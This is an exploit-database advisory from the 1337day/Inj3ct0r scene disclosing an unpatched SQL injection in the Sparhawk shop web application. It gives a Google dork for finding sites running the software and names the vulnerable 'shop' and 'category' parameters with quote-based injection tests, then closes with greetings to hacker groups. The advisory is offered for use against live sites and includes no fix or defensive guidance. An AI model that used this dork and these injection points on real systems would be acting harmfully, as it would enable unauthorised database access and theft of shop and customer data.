Sparhawk SQL Injection

`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm kalashinkov3 member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
[+] Info================================================================  
  
[-] Title : Sparhawk (shop) SQL Injection Vulnerability  
[-] Author: Kalashinkov3  
[-] Home : 13000 / ALGERIA   
[-] Website : 1337day.com   
[-] Vendor: www.sparhawkcorp.com  
[-] Email : kalashinkov3[at]Hotmail[dot]Fr  
[-] Date : 06/10/2011  
[-] Google Dork : powered by the Sparhawk Fundraising eMALL Engine  
[-] Category : webapps / 0day  
[-] Special Thanks : -> KedAns-Dz, Caddy-Dz, KnocKout <-  
  
[+] Exploit===============================================================  
  
  
[-] SQL-i :)  
  
# http://[localhost]/shop.php?shop=1'  
# http://[localhost]/shop.php?shop=[SQLi]  
  
# http://[localhost]/category.php?category='1  
# http://[localhost]/category.php?category=[SQLi]  
  
  
  
  
  
^_^ G00d LUCK ALL :=)  
  
[+] Greets===================================================================+  
+   
BrOx-dz, KedAns-Dz, Caddy-Dz, KnocKout, Rizky Ariestiyansyah, +  
Keinji1258, 1337day.com, packetstormsecurity.org, Exploit-id.com, Over-x +  
andhrahackers.com, 1337day.com/team, id-backtrack.com, dofus-exploit.com +  
all Algerians Hacker'S ;), All My Friends +  
( I Love You Lila ) +  
+  
=============================================================================+  
`